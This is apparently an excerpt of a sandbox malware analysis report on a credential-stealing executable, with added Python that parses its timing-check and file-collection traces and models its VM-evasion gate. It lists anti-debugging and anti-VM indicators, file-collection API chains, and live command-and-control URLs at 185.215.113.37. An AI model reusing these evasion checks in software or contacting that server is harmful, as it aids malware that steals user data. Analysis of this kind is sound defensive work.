                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0216 second address: 58D021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D021A second address: 58D0284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFEB92DE1EAh 0x00000010 or esi, 7F1927E8h 0x00000016 jmp 00007EFEB92DE1EBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007EFEB92DE1F8h 0x00000022 sbb cl, 00000048h 0x00000025 jmp 00007EFEB92DE1EBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp], ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007EFEB92DE1F5h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0284 second address: 58D02B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFEB91CA54Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFEB91CA54Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D02B8 second address: 58D02BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D02FA second address: 58D02FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D02FE second address: 58D0304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0304 second address: 58D0332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB91CA54Ch 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, E2h 0x00000014 jmp 00007EFEB91CA552h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0332 second address: 58D0338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0338 second address: 58D0346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0346 second address: 58D0376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007EFEB92DE1EBh 0x0000000a or ax, 081Eh 0x0000000f jmp 00007EFEB92DE1F9h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D0376 second address: 58D0386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122EB1C second address: 122EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 122EB23 second address: 122EB2D instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB91CA54Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
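                Every listing above begins and ends with rdtsc because the sandbox hooks that instruction and records what executed between two consecutive reads of the timestamp counter. In almost every record that is only push/pop, pushad/popad and short jumps, with no arithmetic or memory access, and many records chain (the second address of one is the first address of the next), so the sample is reading the counter repeatedly in tight succession: the shape of a protector's rdtsc-delta timing check rather than application logic, which fits the Oreans/WinLicense strings found in memory later in this section. The Python below is an example added by the editor, not part of the Joe Sandbox report or its tooling. It parses lines in this format and summarises each pair: net stack effect of the in-between instructions, branch count, any instruction that is neither stack shuffling nor a branch, whether consecutive records chain, and whether the address gap equals the listing's final offset (when it does not, a jump inside the window was taken). The four sample lines are copied from this report; the field names and the classification are the editor's own.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' lines and summarise each rdtsc pair.

Added example; not part of the report. Sample lines are copied from the report above
(the collapsed column separator after "file.exe" is restored, which the parser ignores anyway).
"""
import re
from collections import Counter

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A400E second address: 12A4049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA558h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007EFEB91CA559h 0x00000014 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4049 second address: 12A404D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A4178 second address: 12A4185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007EFEB91CA546h 0x0000000c popad 0x0000000d rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58D021A second address: 58D0284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFEB92DE1EAh 0x00000010 or esi, 7F1927E8h 0x00000016 jmp 00007EFEB92DE1EBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007EFEB92DE1F8h 0x00000022 sbb cl, 00000048h 0x00000025 jmp 00007EFEB92DE1EBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp], ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007EFEB92DE1F5h 0x00000036 rdtsc",
]

HEADER_RE = re.compile(r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)\s+instructions:\s*(.*)$")
# Each instruction in the listing is prefixed by its byte offset, written as 0x plus eight hex digits.
SPLIT_RE = re.compile(r"\s*0x([0-9A-Fa-f]{8})\s+")
# Net effect on the 32-bit stack pointer, in dwords, of the stack-shuffling mnemonics seen in the listings.
STACK_EFFECT = {"push": 1, "pop": -1, "pushad": 8, "popad": -8, "pushfd": 1, "popfd": -1}


def parse_interceptor_line(line):
    """Return {'first', 'second', 'instructions': [(offset, mnemonic, operands), ...]} or None."""
    m = HEADER_RE.search(line)
    if not m:
        return None
    parts = SPLIT_RE.split(m.group(3).strip())  # ['', off, text, off, text, ...]
    instructions = []
    for off, text in zip(parts[1::2], parts[2::2]):
        mnemonic, _, operands = text.strip().partition(" ")
        instructions.append((int(off, 16), mnemonic.lower(), operands.strip()))
    return {"first": int(m.group(1), 16), "second": int(m.group(2), 16), "instructions": instructions}


def summarize_pair(rec):
    """Characterise what ran between the two rdtsc reads of one record."""
    mnems = [m for _, m, _ in rec["instructions"]]
    non_stack = [(m, o) for _, m, o in rec["instructions"]
                 if m != "rdtsc" and m not in STACK_EFFECT and not m.startswith("j")]
    return {
        "first": rec["first"],
        "second": rec["second"],
        "is_sandwich": len(mnems) >= 2 and mnems[0] == "rdtsc" and mnems[-1] == "rdtsc",
        "stack_delta": sum(STACK_EFFECT.get(m, 0) for m in mnems),
        "branches": sum(1 for m in mnems if m.startswith("j")),
        "non_stack": non_stack,
        # True when the second rdtsc sits exactly where the straight-line listing says it does.
        "gap_matches_listing": rec["second"] - rec["first"] == rec["instructions"][-1][0],
    }


def find_chains(records):
    """Group records whose second address is the next record's first address (back-to-back reads)."""
    chains = []
    for rec in records:
        if chains and chains[-1][-1]["second"] == rec["first"]:
            chains[-1].append(rec)
        else:
            chains.append([rec])
    return chains


def mnemonic_histogram(records):
    return Counter(m for rec in records for _, m, _ in rec["instructions"])


def analyze(lines):
    records = [r for r in map(parse_interceptor_line, lines) if r]
    return {
        "pairs": [summarize_pair(r) for r in records],
        "chain_lengths": [len(c) for c in find_chains(records)],
        "histogram": mnemonic_histogram(records),
    }


if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for p in result["pairs"]:
        print(f"{p['first']:08X}->{p['second']:08X} stack={p['stack_delta']:+d} "
              f"branches={p['branches']} non_stack={[m for m, _ in p['non_stack']]} "
              f"gap_ok={p['gap_matches_listing']}")
    print("chain lengths:", result["chain_lengths"])
    print("most common mnemonics:", result["histogram"].most_common(5))
```

                Feed it every interceptor line of the section to get the whole picture. Individual windows often have a non-zero stack delta because the record boundaries cut through a longer save/restore sequence around the two reads; the per-window delta is therefore less telling than the near-total absence of non-stack instructions and the short chains, which together are what a timing check wrapped in a mutation engine looks like from the outside. The fourth sample, from the 58D0xxx range, is the exception that proves the rule: it contains real prologue work (mov dword ptr [esp], ebp) with flag-preserving junk around it.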
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12242DE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 122A618 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12B4B01 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E34910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E34570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E33EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E21160 GetSystemInfo,ExitProcess
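                The "Code function" lines above share one call shape: FindFirstFileA, a pair of StrCmpCA (the usual idiom for skipping the "." and ".." entries, though the report shows call order, not arguments), sometimes PathMatchSpecA against a pattern, then CopyFileA and DeleteFileA inside a FindNextFileA loop closed by FindClose. Read together they are the sample's directory-walk-and-collect routines, which is the behaviour one expects from the Stealc verdict in the overview. The Python below is an example added by the editor, not part of the report or the sample; it parses lines in this format and sorts each function by that shape. The sample lines are copied from this report, including the function id the report repeats as a trailing link; the verdict labels are the editor's own.

```python
"""Parse Joe Sandbox 'Code function' lines and flag directory-walk-and-collect routines.

Added example; not part of the report. Sample lines are copied from the report above
(the report repeats the function id at the end of each line as link text).
"""
import re

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E338B0",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E2DA80",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E2E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E2E430",
    r"Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00E21160 GetSystemInfo,ExitProcess,0_2_00E21160",
]

# Function id (pid_run_address) followed by the comma-separated call list, which contains no spaces.
FUNC_RE = re.compile(r"Code function:\s*(\d+_\d+_[0-9A-Fa-f]+)\s+(\S+)")


def parse_code_function_line(line):
    """Return (function_id, [api, api, ...]) or None for lines of another type."""
    m = FUNC_RE.search(line)
    if not m:
        return None
    func_id, raw = m.group(1), m.group(2)
    # Drop empty fields from a trailing comma and the repeated function id.
    calls = [c for c in raw.split(",") if c and c != func_id]
    return func_id, calls


def classify_walk(calls):
    """Describe the FindFirstFileA ... FindNextFileA window of one function's call sequence."""
    if "FindFirstFileA" not in calls:
        return {"verdict": "no directory walk", "loop_body": []}
    start = calls.index("FindFirstFileA")
    end = calls.index("FindNextFileA", start) if "FindNextFileA" in calls[start:] else len(calls)
    body = calls[start + 1:end]
    info = {
        "loop_body": body,
        "copies": "CopyFileA" in body,
        "deletes": "DeleteFileA" in body,
        "pattern_filter": "PathMatchSpecA" in body,
        "name_compares": body.count("StrCmpCA"),
        "closes_handle": "FindClose" in calls[end:],
    }
    if info["copies"] and info["deletes"]:
        info["verdict"] = "collect-and-remove loop"
    elif info["copies"]:
        info["verdict"] = "collect loop"
    else:
        info["verdict"] = "enumerate-only walk"
    return info


def triage(lines):
    """Map every 'Code function' line to (function_id, verdict), skipping other line types."""
    out = []
    for line in lines:
        parsed = parse_code_function_line(line)
        if parsed:
            func_id, calls = parsed
            out.append((func_id, classify_walk(calls)["verdict"]))
    return out


if __name__ == "__main__":
    for func_id, verdict in triage(SAMPLE_LINES):
        print(func_id, verdict)
```

                The verdicts are a triage aid, not proof: a "collect-and-remove loop" tells you which functions to open first in the disassembler to recover the path patterns handed to PathMatchSpecA and the destination passed to CopyFileA, which the report's call list alone does not show.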
                Source: file.exe, file.exe, 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2190392041.0000000001999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareNW
                Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2190392041.00000000019C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13543
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13546
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13597
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13564
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13557
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
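                The execution graph at the end of this report shows the order in which the sample gates itself before it touches the C2 code: GetSystemInfo, VirtualAllocExNuma, a memory figure computed through __aulldiv, GetUserDefaultLangID and GetUserNameA, each with an edge straight to ExitProcess. The following Python is an added example by the editor, not code from the report or from the sample: it models that decision chain so an analyst can see which property of a VM profile makes the sample quit early. Every threshold, the five rejected language IDs and the user-name list are assumptions; the report shows the branches, not the values compared.

```python
"""Model of the pre-execution environment gate seen in the report's execution
graph.  Added example, not code from the report or from the sample.  Each check
mirrors one API -> ExitProcess edge; thresholds and lists are ASSUMED.
"""
from dataclasses import dataclass
from typing import List, Optional

# ASSUMED minimums (the report does not print them); tune to what your VM exposes.
MIN_PROCESSORS = 2          # GetSystemInfo -> dwNumberOfProcessors
MIN_RAM_MB = 2048           # what the __aulldiv in the graph most plausibly computes
# ASSUMED primary-language IDs (low 10 bits of a LANGID): five values, one per
# ExitProcess branch that follows GetUserDefaultLangID in the graph.
REJECTED_PRIMARY_LANGS = frozenset({0x19, 0x22, 0x23, 0x3F, 0x43})
# ASSUMED user names; the graph only shows GetUserNameA feeding a compare that
# has its own ExitProcess branch.
REJECTED_USERNAMES = frozenset({"sandbox", "malware", "virus", "test", "john doe"})


@dataclass(frozen=True)
class HostProfile:
    """What the checked APIs would return on a given machine (constructed input)."""
    processors: int        # GetSystemInfo
    numa_alloc_ok: bool    # VirtualAllocExNuma returned a non-NULL pointer
    ram_mb: int            # total physical memory in MB
    langid: int            # GetUserDefaultLangID
    username: str          # GetUserNameA


def primary_lang(langid: int) -> int:
    """PRIMARYLANGID(): a LANGID is 16 bits, the primary language is the low 10."""
    return langid & 0x3FF


def failed_checks(p: HostProfile) -> List[str]:
    """Every check that would route to ExitProcess, in the graph's call order."""
    failures = []
    if p.processors < MIN_PROCESSORS:
        failures.append("GetSystemInfo: too few processors")
    if not p.numa_alloc_ok:
        failures.append("VirtualAllocExNuma: allocation failed")
    if p.ram_mb < MIN_RAM_MB:
        failures.append("memory below threshold")
    if primary_lang(p.langid) in REJECTED_PRIMARY_LANGS:
        failures.append("GetUserDefaultLangID: rejected locale")
    if p.username.lower() in REJECTED_USERNAMES:
        failures.append("GetUserNameA: rejected user name")
    return failures


def first_exit(p: HostProfile) -> Optional[str]:
    """The sample exits at the first failing check; None means it keeps running."""
    failures = failed_checks(p)
    return failures[0] if failures else None


if __name__ == "__main__":
    # Constructed profiles: a lean analysis VM and a desktop-like machine.
    lean_vm = HostProfile(1, True, 1024, 0x0409, "user")
    desktop = HostProfile(4, True, 8192, 0x0409, "user")
    for name, prof in (("lean_vm", lean_vm), ("desktop", desktop)):
        print(name, "->", first_exit(prof), failed_checks(prof))
```

                Run against your own sandbox profile, a non-empty list tells you which VM property to change before re-detonating; the order of the list matters because the sample never reaches the later checks once one fails.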

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E245C0 VirtualProtect ?,00000004,00000100,000000000_2_00E245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E39860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39750 mov eax, dword ptr fs:[00000030h]0_2_00E39750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E378E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00E378E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4132, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E39600
                Source: file.exe, 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: QlProgram Manager
                Source: file.exeBinary or memory string: DQlProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E37B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00E37980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E37850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E37A30

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4132, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4132, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). The matrix grid did not survive extraction; the techniques that carry a matched-signature count in the original, grouped by tactic, with the count in parentheses:

                Execution: Command and Scripting Interpreter (2); Native API (11)
                Persistence: DLL Side-Loading (1)
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1)
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
                Discovery: System Time Discovery (2); Security Software Discovery (count garbled in extraction); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (count garbled in extraction)
                Collection: Archive Collected Data (1)
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12)

                No technique under Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact carries a count.
                Source | Detection | Scanner | Label
                file.exe | 53% | Virustotal |
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.phpr | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpL | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpM | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpe | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpy | 17% | Virustotal |
                http://185.215.113.37/e2b1563c6670f193.phpA | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpM | file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpL | file.exe, 00000000.00000002.2190392041.00000000019C8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpl | file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
